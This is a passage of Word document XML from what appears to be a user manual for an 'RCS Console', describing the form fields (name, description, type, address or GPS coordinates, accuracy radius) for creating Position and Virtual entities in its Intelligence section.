            <w:r w:rsidR="00C9792B" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00C9792B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Intelligence &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00C9792B" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00C9792B">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00C9792B" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
            <w:r w:rsidR="00C9792B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; New Entity (Position)</w:t>
            </w:r>
            <w:r w:rsidR="003A4380">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1082" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:237pt;height:358.5pt;z-index:251714560;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId57" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1082" DrawAspect="Content" ObjectID="_1446455345" r:id="rId58"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D8707E" w:rsidRDefault="00D8707E" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D8707E" w:rsidRPr="00240B6F" w:rsidRDefault="00D8707E" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00D8707E" w:rsidRPr="00240B6F" w:rsidRDefault="00D8707E" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00D8707E" w:rsidRPr="00240B6F" w:rsidRDefault="00D8707E" w:rsidP="00D86157">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w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ntity’s name.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00D8707E" w:rsidRPr="00240B6F" w:rsidRDefault="00D8707E" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is a not mandatory field </w:t>
            </w:r>
            <w:r w:rsidR="0025099E" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>to be used for storing additional information</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> about the </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ntity.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00D8707E" w:rsidRPr="00240B6F" w:rsidRDefault="00D8707E" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] allows you to specify which type of </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ntity you’re about to create.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="007914C7" w:rsidRPr="00240B6F" w:rsidRDefault="007914C7" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>find by address</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] allows you to specify </w:t>
            </w:r>
            <w:r w:rsidR="00A000B3" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>that the geographic position will be provided by an address</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="007914C7" w:rsidRPr="00240B6F" w:rsidRDefault="007914C7" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>find by coordinates</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00A000B3" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>allows you to specify that the geographic position will be provided by coordinates.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="007914C7" w:rsidRPr="00240B6F" w:rsidRDefault="007914C7" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Address</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00A000B3" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is the geographic address of the position, only if [ find by address ] has been selected.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00A000B3" w:rsidRPr="00240B6F" w:rsidRDefault="00A000B3" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Latitude</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] and [ </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Longitude</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] are the GPS coordinates</w:t>
            </w:r>
            <w:r w:rsidR="00A72009" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">of the position, only if [ find by </w:t>
            </w:r>
            <w:r w:rsidR="00A72009" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>coordinates</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] has been selected.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00D8707E" w:rsidRPr="00240B6F" w:rsidRDefault="007914C7" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Accurancy</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00A000B3" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is the radius size to specify the range error of the position</w:t>
            </w:r>
            <w:r w:rsidR="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00900352" w:rsidRDefault="00900352" w:rsidP="00BC2719">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0087756C" w:rsidRDefault="0087756C" w:rsidP="00134262">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003C7E2B" w:rsidRDefault="003C7E2B" w:rsidP="003C7E2B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Once the </w:t>
      </w:r>
      <w:r w:rsidR="00690B72">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Position</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC58A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ntity is created you can access the </w:t>
      </w:r>
      <w:r w:rsidR="00FC58A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ntity page (double-click) providing </w:t>
      </w:r>
      <w:r w:rsidR="00690B72">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pictures.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B24E33" w:rsidRDefault="00B24E33" w:rsidP="003C7E2B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C9792B" w:rsidRDefault="00C9792B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B24E33" w:rsidRDefault="00EB3EA6" w:rsidP="00B24E33">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The image</w:t>
      </w:r>
      <w:r w:rsidR="00B24E33">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> below shows the pop-up window for the creation of a new entity of type Virtual.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B24E33" w:rsidRDefault="00B24E33" w:rsidP="00B24E33">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B24E33" w:rsidTr="00240B6F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4957" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C9792B" w:rsidRDefault="00C9792B" w:rsidP="00B24E33">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00B24E33" w:rsidRPr="00057420" w:rsidRDefault="0010013A" w:rsidP="0010013A">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3.5</w:t>
            </w:r>
            <w:r w:rsidR="00C9792B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C9792B" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00C9792B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00C9792B" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00C9792B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Intelligence &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00C9792B" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00C9792B">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00C9792B" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
            <w:r w:rsidR="00C9792B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; New Entity (Virtual)</w:t>
            </w:r>
            <w:r w:rsidR="003A4380">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1083" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:237pt;height:141.75pt;z-index:251716608;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId59" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1083" DrawAspect="Content" ObjectID="_1446455346" r:id="rId60"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="236" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B24E33" w:rsidRDefault="00B24E33" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B24E33" w:rsidRPr="00240B6F" w:rsidRDefault="00B24E33" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00B24E33" w:rsidRPr="00240B6F" w:rsidRDefault="00B24E33" w:rsidP="00D86157">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00B24E33" w:rsidRPr="00240B6F" w:rsidRDefault="00B24E33" w:rsidP="00D86157">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w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ntity’s name.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00B24E33" w:rsidRPr="00240B6F" w:rsidRDefault="00B24E33" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] is a not mandatory field </w:t>
            </w:r>
            <w:r w:rsidR="0025099E" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>to be used for storing additional information</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> about the </w:t>
            </w:r>
            <w:r w:rsidR="00FC58A7" w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidRPr="00240B6F">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ntity.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0029750F" w:rsidRPr="0029750F" w:rsidRDefault="0029750F" w:rsidP="0029750F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00B24E33" w:rsidRPr="00240B6F" w:rsidRDefault="00B24E33" w:rsidP="00D86157">
